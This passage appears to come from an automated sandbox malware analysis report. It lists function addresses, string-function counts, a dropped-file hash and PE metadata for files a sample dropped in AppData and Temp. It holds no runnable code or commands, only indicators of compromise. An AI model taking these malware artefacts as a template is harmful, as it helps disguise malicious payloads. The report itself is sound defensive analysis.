                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B1FE713_2_009B1FE7
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_0016801720_2_00168017
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_0015E14420_2_0015E144
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_0014E1F020_2_0014E1F0
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_0017A26E20_2_0017A26E
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001622A220_2_001622A2
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001422AD20_2_001422AD
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_0015C62420_2_0015C624
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_0017E87F20_2_0017E87F
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001CC8A420_2_001CC8A4
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001B2A0520_2_001B2A05
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00176ADE20_2_00176ADE
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001A8BFF20_2_001A8BFF
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_0015CD7A20_2_0015CD7A
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_0016CE1020_2_0016CE10
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_0017715920_2_00177159
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_0014924020_2_00149240
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001D531120_2_001D5311
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001496E020_2_001496E0
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_0016170420_2_00161704
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00161A7620_2_00161A76
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00149B6020_2_00149B60
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00167B8B20_2_00167B8B
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00161D2020_2_00161D20
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00167DBA20_2_00167DBA
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00161FE720_2_00161FE7
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99E7A9C21_2_00007FF6C99E7A9C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99C7B6021_2_00007FF6C99C7B60
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99E6B5021_2_00007FF6C99E6B50
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99E172021_2_00007FF6C99E1720
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D867021_2_00007FF6C99D8670
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99C100021_2_00007FF6C99C1000
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D42D421_2_00007FF6C99D42D4
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99C92D021_2_00007FF6C99C92D0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99DF32021_2_00007FF6C99DF320
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99E4A6021_2_00007FF6C99E4A60
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D227421_2_00007FF6C99D2274
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99E172021_2_00007FF6C99E1720
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D2A9421_2_00007FF6C99D2A94
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D84BC21_2_00007FF6C99D84BC
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99DAC5021_2_00007FF6C99DAC50
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99DECA021_2_00007FF6C99DECA0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D248021_2_00007FF6C99D2480
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D8EF421_2_00007FF6C99D8EF4
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99E26C421_2_00007FF6C99E26C4
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D3ED021_2_00007FF6C99D3ED0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99E4EFC21_2_00007FF6C99E4EFC
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D268421_2_00007FF6C99D2684
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99E6DCC21_2_00007FF6C99E6DCC
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D354021_2_00007FF6C99D3540
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99E755021_2_00007FF6C99E7550
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99C9D9B21_2_00007FF6C99C9D9B
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D207021_2_00007FF6C99D2070
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D289021_2_00007FF6C99D2890
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99EA7D821_2_00007FF6C99EA7D8
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D867021_2_00007FF6C99D8670
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99DE80C21_2_00007FF6C99DE80C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99CA76D21_2_00007FF6C99CA76D
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99C9F3B21_2_00007FF6C99C9F3B
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D675021_2_00007FF6C99D6750
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFB3CF16022_2_00007FFDFB3CF160
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFBAB610022_2_00007FFDFBAB6100
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF241D8E22_2_00007FFDFF241D8E
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF241EDD22_2_00007FFDFF241EDD
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF265CF022_2_00007FFDFF265CF0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF241CBC22_2_00007FFDFF241CBC
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF241AD722_2_00007FFDFF241AD7
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2B9B3022_2_00007FFDFF2B9B30
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2421DF22_2_00007FFDFF2421DF
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF24154622_2_00007FFDFF241546
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF24159622_2_00007FFDFF241596
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF28577022_2_00007FFDFF285770
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF28D7C022_2_00007FFDFF28D7C0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF26B70022_2_00007FFDFF26B700
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF28937022_2_00007FFDFF289370
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF241FD722_2_00007FFDFF241FD7
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF24155A22_2_00007FFDFF24155A
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF28D2F022_2_00007FFDFF28D2F0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2570B022_2_00007FFDFF2570B0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2421C122_2_00007FFDFF2421C1
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF241C1222_2_00007FFDFF241C12
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF306D9022_2_00007FFDFF306D90
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2424D722_2_00007FFDFF2424D7
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF24149C22_2_00007FFDFF24149C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF24117C22_2_00007FFDFF24117C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF24161822_2_00007FFDFF241618
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF24261222_2_00007FFDFF242612
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2426FD22_2_00007FFDFF2426FD
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF24143D22_2_00007FFDFF24143D
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2413DE22_2_00007FFDFF2413DE
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2417F822_2_00007FFDFF2417F8
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2B26E022_2_00007FFDFF2B26E0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2416FE22_2_00007FFDFF2416FE
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF24863022_2_00007FFDFF248630
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF241A0F22_2_00007FFDFF241A0F
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2AC53022_2_00007FFDFF2AC530
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2783F022_2_00007FFDFF2783F0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF241B5422_2_00007FFDFF241B54
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF24116D22_2_00007FFDFF24116D
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF3509022_2_00007FFDFFF35090
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFED4FE022_2_00007FFDFFED4FE0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEA0FB022_2_00007FFDFFEA0FB0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF1D12022_2_00007FFDFFF1D120
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF1A17022_2_00007FFDFFF1A170
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF1B1A022_2_00007FFDFFF1B1A0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEACF1022_2_00007FFDFFEACF10
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF481D022_2_00007FFDFFF481D0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF1420022_2_00007FFDFFF14200
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF3622022_2_00007FFDFFF36220
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEFBE7022_2_00007FFDFFEFBE70
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEBCE3022_2_00007FFDFFEBCE30
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF342A022_2_00007FFDFFF342A0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEEFE1022_2_00007FFDFFEEFE10
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEBEDE022_2_00007FFDFFEBEDE0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF4036022_2_00007FFDFFF40360
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF4937022_2_00007FFDFFF49370
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEB1D2022_2_00007FFDFFEB1D20
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF02D1D22_2_00007FFDFFF02D1D
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEEDD1022_2_00007FFDFFEEDD10
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE9BCF022_2_00007FFDFFE9BCF0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF06CF022_2_00007FFDFFF06CF0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF4743022_2_00007FFDFFF47430
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF01C6022_2_00007FFDFFF01C60
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEEAC6022_2_00007FFDFFEEAC60
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE93BD022_2_00007FFDFFE93BD0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE9FBC022_2_00007FFDFFE9FBC0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFED9BB022_2_00007FFDFFED9BB0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF0C51022_2_00007FFDFFF0C510
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE99BA022_2_00007FFDFFE99BA0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEB6B4022_2_00007FFDFFEB6B40
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF3E58022_2_00007FFDFFF3E580
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEB7B1022_2_00007FFDFFEB7B10
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEA9AB022_2_00007FFDFFEA9AB0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEF6A1022_2_00007FFDFFEF6A10
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEAC9A022_2_00007FFDFFEAC9A0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEBD8D022_2_00007FFDFFEBD8D0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE9A8A022_2_00007FFDFFE9A8A0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE9283E22_2_00007FFDFFE9283E
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE947E022_2_00007FFDFFE947E0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF1996022_2_00007FFDFFF19960
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEA672022_2_00007FFDFFEA6720
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF21AD022_2_00007FFDFFF21AD0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFED45D022_2_00007FFDFFED45D0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF43AF022_2_00007FFDFFF43AF0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF27B5022_2_00007FFDFFF27B50
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE9453022_2_00007FFDFFE94530
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEB950022_2_00007FFDFFEB9500
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE994C022_2_00007FFDFFE994C0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFECC4B922_2_00007FFDFFECC4B9
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF46C1022_2_00007FFDFFF46C10
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF3CC4022_2_00007FFDFFF3CC40
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEA342022_2_00007FFDFFEA3420
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEA238022_2_00007FFDFFEA2380
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEEB37022_2_00007FFDFFEEB370
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF17D5022_2_00007FFDFFF17D50
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF52D6022_2_00007FFDFFF52D60
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEDB31022_2_00007FFDFFEDB310
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF2BDB022_2_00007FFDFFF2BDB0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE972F122_2_00007FFDFFE972F1
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEEC2F022_2_00007FFDFFEEC2F0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFE932A522_2_00007FFDFFE932A5
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF35E2022_2_00007FFDFFF35E20
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEE628022_2_00007FFDFFEE6280
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF45E4022_2_00007FFDFFF45E40
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEF420022_2_00007FFDFFEF4200
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF39EC022_2_00007FFDFFF39EC0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEFB13022_2_00007FFDFFEFB130
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFF38FA022_2_00007FFDFFF38FA0
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFFEC10E022_2_00007FFDFFEC10E0
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: String function: 009D22D0 appears 55 times
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: String function: 009B4D98 appears 42 times
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: String function: 0099B329 appears 60 times
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: String function: 009B917B appears 36 times
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: String function: 009C3319 appears 48 times
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: String function: 009AFD52 appears 81 times
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: String function: 00997873 appears 34 times
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: String function: 009B4CD3 appears 62 times
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: String function: 009B0DA0 appears 92 times
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: String function: 0099BD98 appears 33 times
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: String function: 00007FF6C99C2B10 appears 47 times
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: String function: 00007FFDFF2BC931 appears 39 times
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: String function: 00007FFDFFE99330 appears 130 times
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: String function: 00007FFDFFEC1940 appears 36 times
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: String function: 00007FFDFF2BC93D appears 69 times
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: String function: 00007FFDFF2BC265 appears 48 times
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: String function: 00007FFDFF2BC17B appears 38 times
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: String function: 00007FFDFF2BC16F appears 334 times
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: String function: 00007FFDFF241325 appears 517 times
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: String function: 00007FFDFFE9A4B0 appears 175 times
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: String function: 00007FFDFF2BC181 appears 1187 times
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: String function: 00160DA0 appears 46 times
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: String function: 0015FD52 appears 31 times
                        Source: Og1SeeXcB2.exeStatic PE information: invalid certificate
                        Source: rar.exe.21.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: unicodedata.pyd.21.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: rar.exe.39.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: unicodedata.pyd.39.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: api-ms-win-core-sysinfo-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-locale-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-synch-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-localization-l1-2-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-handle-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-synch-l1-2-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-timezone-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-convert-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-memory-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-errorhandling-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-file-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-debug-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-rtlsupport-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-file-l1-2-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-string-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-filesystem-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-processthreads-l1-1-1.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-profile-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-utility-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-heap-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-util-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-console-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-file-l2-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-libraryloader-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-math-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-string-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-string-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-environment-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-runtime-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-processthreads-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-process-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-heap-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-processenvironment-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-datetime-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-timezone-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-stdio-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-interlocked-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-namedpipe-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-file-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-file-l1-2-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-file-l2-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-filesystem-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-datetime-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-heap-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-processthreads-l1-1-1.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-rtlsupport-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-heap-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-debug-l1-1-0.dll.21.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-sysinfo-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-core-memory-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
                        Source: api-ms-win-crt-utility-l1-1-0.dll.39.drStatic PE information: No import functions for PE file found
